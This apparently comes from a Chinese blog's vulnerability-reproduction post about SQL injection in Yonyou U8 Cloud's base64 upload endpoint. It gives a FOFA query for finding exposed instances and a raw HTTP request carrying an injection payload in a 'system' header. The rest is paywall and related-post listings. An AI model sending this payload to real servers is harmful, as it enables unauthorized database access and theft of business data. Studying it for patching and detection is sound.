【漏洞复现】用友U8Cloud base64 SQL注入漏洞

最新推荐文章于 2025-05-28 16:36:24 发布

从不学安全

最新推荐文章于 2025-05-28 16:36:24 发布

阅读量750

点赞数 2

分类专栏：漏洞复现文章标签： sql 数据库

本文链接：https://blog.csdn.net/qq_67810151/article/details/136851995

版权

漏洞复现专栏收录该内容

99 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了用友U8 Cloud产品的一个SQL注入漏洞，该漏洞可能导致未授权攻击者获取数据库权限，进而窃取用户数据。文章包含漏洞概述、测绘语句、复现过程及影响范围。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。

0x02 漏洞概述

用友U8 Cloud 存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄露。

0x03 测绘语句

fofa: app="用友-U8-Cloud"

0x04 漏洞复现

GET /u8cloud/api/file/upload/base64 HTTP/1.1

Host: xxxx

system: -1' or 1=@@version--+

0x05 影响

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

用友U8 Cloud base64 SQL注入漏洞复现

0xSec

03-13

1285

用友U8 Cloudbase64接口处存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄露。

用友U8 Cloud base64 SQL注入

weixin_43567873的博客

03-15

471

用友U8 Cloud base64 SQL注入

参与评论您还未登录，请先登录后发表或查看评论

Ufida U8v10.1 安装到sqlserver2008R2 故障转移集群

ewalker的专栏

02-25

3908

U8设计之初被用在局域网单服务器环境下工作，而有客户为了保证业务的低故障延迟性做了sqlserver2008R2的双机热备（比较过时的做法）。但他们并没有使用2008自带的故障转移特性而是使用了第三方的双机控制软件，导致数据库服务切换时出现严重问题，只能说对自己手头的工具不熟悉，害死人啊。使用vmware workstation8虚拟机搭建测试平台环境： win server2003

用友U8_Cloud-base64存在SQL注入漏洞

qq_36334672的博客

04-03

634

用友-U8-Cloud-base64接口处存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄露。

用友U8-cloud_base64接口存在漏洞

m0_46604997的博客

04-03

648

U8 cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案，全面支持多组织业务协同、营销创新、智能财务、人力服务，构建产业链制造平台，融合用友云服务，实现企业互联网资源连接、共享、协同，赋能中国成长型企业高速发展、云化创新。U8 cloud base64 接口处存在SQL注入漏洞。攻击者可以窃取用户的隐私信息、业务数据等，造成用户信息泄露，更严重的是数据库服务器控制有很大风险被攻击者控制等相关安全问题。

用友u8-cloud RegisterServlet SQL注入漏洞复现

fly夏天的博客

12-25

1856

用友U8 cloud是用友推出的企业上云数字化平台，该产品RegisterServlet接口处存在SQL注入漏洞，攻击者可通过该漏洞获取数据库权限。文章复现了该漏洞并提供了进一步利用的相关方案。并提供了官方的修复方案。

用友U8 Cloud SQL注入漏洞复现

12-06

683

用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。

【漏洞复现】用友-U8C-Cloud-base64-sql注入

知黑而守白

03-14

266

用友U8Cloud是用友网络科技股份有限公司（简称“用友网络”）推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能，包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式，适用于不同行业和企业规模的需求，帮助企业实现数字化转型和云端化管理。用友U8Cloud base64 接口存在SQL注入漏洞，该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句，成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。

解决：MySQL client, error code: 1251, SQLState: 08004

liulilittle的博客

05-28

210

MySQL认证协议不兼容问题解决方案：客户端报错1251是由于MySQL 8.0默认使用caching_sha2_password认证方式，而旧客户端不支持。可通过修改用户认证插件为mysql_native_password解决。修复步骤：1）执行ALTER USER修改认证方式；2）FLUSH PRIVILEGES刷新权限。该方法可快速解决客户端连接认证失败问题，适用于MySQL 8.0与旧版客户端的兼容场景。

pgsql 查看每张表大小

狼魂之力

05-27

710

pg_size_pretty(pg_total_relation_size(‘表名’)) AS 总大小;pg_size_pretty(pg_relation_size(‘表名’)) AS 数据大小,pg_size_pretty(pg_indexes_size(‘表名’)) AS 索引大小,如果没有显示，右键点击表 → 选择"属性" → 在"存储"标签页查看详细大小信息。在表列表中，默认会显示"大小"列（以简洁格式如16K、80K显示）在表列表中右键 → “查看” → 勾选"大小"列（如果默认未显示）

业务场景中使用 SQL 实现快速数据更新与插入

ALex_zry的博客

05-23

381

本文介绍了气象数据处理系统中分钟级降水数据的更新和插入实现方法。通过INSERT INTO ... ON DUPLICATE KEY UPDATE语法，可以自动检测并处理数据冲突，实现存在则更新、不存在则插入的功能。文章详细说明了SQL语句构造和C++代码实现步骤，包括数据表结构、动态SQL生成和数据库操作。同时提供了使用注意事项，如性能优化、错误处理和安全性考虑，帮助开发者高效准确地处理气象数据。该方法适用于需要定期更新时间序列数据的应用场景。

Postgresql 数据库体系架构

zyb378747350的专栏

05-23

398

如何收集Oracle DB SQL Monitor报告

最新发布

huiyangxu blog

05-28

294

可以通过企业管理器云控制（Enterprise Manager Cloud Control）或企业管理器数据库 express 版（EM Express），在性能中心（通过 “性能” 菜单进入）的 “已监控 SQL” 选项卡中，直接访问活动 SQL 监视器报告。可以通过sqldeveloper 管理工具–优化–实时SQL监视，选中要生成报告的SQL，点保存按钮就可以直接保存到本地。下面是12C的示例，如果你的网络里有统一管理的EM也可以查看。工具虽然是免费的，但是前提你要有相应的授权。

MyBatis-Plus 中的动态SQL 片段（sqlSegment）讲解

huangli的博客

05-26

692

在 MyBatis-Plus 中，`sqlSegment` 通常指 **动态生成的 SQL 代码块**，例如由条件构造器（`Wrapper`）自动生成的 `WHERE` 条件、`ORDER BY` 排序等。开发者可通过特定语法（如 `${ew.customSqlSegment}`或者`${ew.sqlSegment}`）将这些片段插入到自定义 SQL 中，实现灵活组合

SQL进阶之旅 Day 5: 常用函数与表达式

在未来等你的专栏

05-27

426

本篇文章详细介绍了 SQL 中常用的函数和表达式，包括聚合函数、日期函数和条件表达式。通过理论讲解、代码示例和性能对比，帮助读者深入理解这些工具的使用方法和底层原理。此外，还提供了多个实际案例，展示了如何在工作中应用这些技术。下一篇文章将聚焦于“窗口函数实用技巧”，介绍ROW_NUMBERRANK和DENSE_RANK的使用场景和优化策略。

SQL思路解析：逻辑互斥的数据如何处理？

2402_88047672的博客

05-26

558

本文介绍了如何查询2019-08-16时所有产品的价格。主要思路是将问题分为两部分处理：对于有价格变更记录的产品，找出该日期前最后一次变更的价格；对于没有变更记录的产品，使用默认价格10。解决方案通过两条SQL查询实现：第一条查询获取每个产品在2019-08-16或之前的最新价格；第二条查询找出所有变更日期都晚于2019-08-16的产品并赋默认值10。最终使用UNION合并这两个结果集，得到完整的产品价格快照。这种方法清晰地区分了两种产品状态，确保结果准确完整。

SQL解析工具JSQLParser

Liu Zijian‘s Blog

05-23

1156

是一个Java语言的SQL语句解析工具，功能十分强大，它可以将SQL语句解析成为Java类的层次结构，还支持改写SQL，常见的持久层框架MyBatis-Plus就采用它作为SQL解析工具来实现某些功能。用于表示SQL中的字段对象，例如从一个Insert对象获取SQL要添加的全部字段：name，age，tenant_id。是JSqlParser库中的一个核心接口，是用于表示SQL语句中的各种表达式的基类接口，通过调用对象的。，一种带着括号的Expression结构，例如获取insert语句。

PowerShell Install Sql Server 2025 beta

极致，细节

05-26

114

PowerShell脚本用于自动安装SQL Server 2025及相关组件。主要功能包括：下载并安装SQL Server 2025 ISO、SSMS管理工具和VC++运行库；配置.NET Framework依赖；自动挂载ISO镜像并执行静默安装；设置SQL Server实例(MSSQLSERVER)和SA密码(Report@123)；配置防火墙开放1433端口；最后清理安装文件。安装完成后可通过SSMS使用sa/Report@123认证连接SQL Server服务。脚本实现了一键式自动化部署SQL S

SQL输出20个9

chinalog的专栏

05-28

264

最简单直接的方法是第一种使用REPLICATE函数，它会返回由指定字符串重复指定次数后组成的字符串。

用友u8 cloud 反序列化rce漏洞复现

12-05

用友U8 Cloud是一款企业级管理软件，但是近期被发现存在反序列化远程命令执行（RCE）漏洞。要复现这个漏洞，首先需要一个能够触发反序列化的点，比如一个可控制的对象。接下来，我们可以构造一个恶意的序列化数据，然后将这个数据传递给U8 Cloud系统，让系统进行反序列化操作。当系统对这个数据进行反序列化时，就会触发我们植入的恶意代码，从而实现远程命令执行。为了更具体地说明这个过程，我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据，并将其发给U8 Cloud系统。系统在接收到这个数据后，会将其解析，然后执行其中的命令。这样一来，我们就成功地利用了反序列化漏洞来实现远程命令执行。当然，为了成功复现这个漏洞，还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式，还可能需要使用特定的工具来构造恶意的序列化数据。在复现过程中，一定要格外小心，确保不会对受影响的系统造成损害。同时，及时向厂商反馈该漏洞，以便及时修复和加强系统安全防护。